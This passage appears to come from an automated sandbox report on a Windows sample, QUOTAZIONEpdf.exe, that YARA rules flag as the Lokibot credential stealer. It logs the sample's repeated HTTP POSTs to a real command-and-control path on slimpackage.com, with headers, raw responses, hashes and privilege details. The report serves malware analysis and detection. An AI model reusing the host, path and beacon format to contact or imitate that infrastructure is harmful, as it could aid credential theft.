              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:30.453828096 CET | 10352 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:29 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 52 | Source IP: 192.168.2.3 | Source Port: 49863 | Destination IP: 104.223.93.105 | Destination Port: 80 | Process: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:31.498490095 CET | 10353 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:31.754610062 CET | 10354 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:30 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 53 | Source IP: 192.168.2.3 | Source Port: 49864 | Destination IP: 104.223.93.105 | Destination Port: 80 | Process: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:32.828735113 CET | 10355 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:33.107048988 CET | 10355 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:32 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 54 | Source IP: 192.168.2.3 | Source Port: 49865 | Destination IP: 104.223.93.105 | Destination Port: 80 | Process: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:34.246263981 CET | 10356 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:34.502947092 CET | 10357 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:33 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 55 | Source IP: 192.168.2.3 | Source Port: 49866 | Destination IP: 104.223.93.105 | Destination Port: 80 | Process: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:35.583282948 CET | 10357 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:35.838768005 CET | 10358 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:34 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 6 | Source IP: 192.168.2.3 | Source Port: 49748 | Destination IP: 104.223.93.105 | Destination Port: 80 | Process: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:48.938221931 CET | 1113 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:49.243886948 CET | 1113 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:48 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 7 | Source IP: 192.168.2.3 | Source Port: 49749 | Destination IP: 104.223.93.105 | Destination Port: 80 | Process: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:50.316401958 CET | 1114 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:50.639916897 CET | 1115 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:49 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 8 | Source IP: 192.168.2.3 | Source Port: 49750 | Destination IP: 104.223.93.105 | Destination Port: 80 | Process: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:51.814681053 CET | 1116 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:52.091804981 CET | 1116 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:51 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 9 | Source IP: 192.168.2.3 | Source Port: 49751 | Destination IP: 104.223.93.105 | Destination Port: 80 | Process: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:53.249068975 CET | 1117 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:53.547552109 CET | 1118 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:52 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Code Manipulations

              Statistics

              Behavior

              System Behavior

              General

              Start time: 09:52:29
              Start date: 14/01/2022
              Path: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Wow64 process (32bit): true
              Commandline: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
              Imagebase: 0x400000
              File size: 250601 bytes
              MD5 hash: 23B85C2F43B23B57411E4F4366A10B25
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Yara matches:
              • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation: low

              General

              Start time: 09:52:31
              Start date: 14/01/2022
              Path: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Wow64 process (32bit): true
              Commandline: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
              Imagebase: 0x400000
              File size: 250601 bytes
              MD5 hash: 23B85C2F43B23B57411E4F4366A10B25
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000003.316877844.0000000000533000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.556036179.0000000000518000.00000004.00000020.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation: low

              Disassembly

              Code Analysis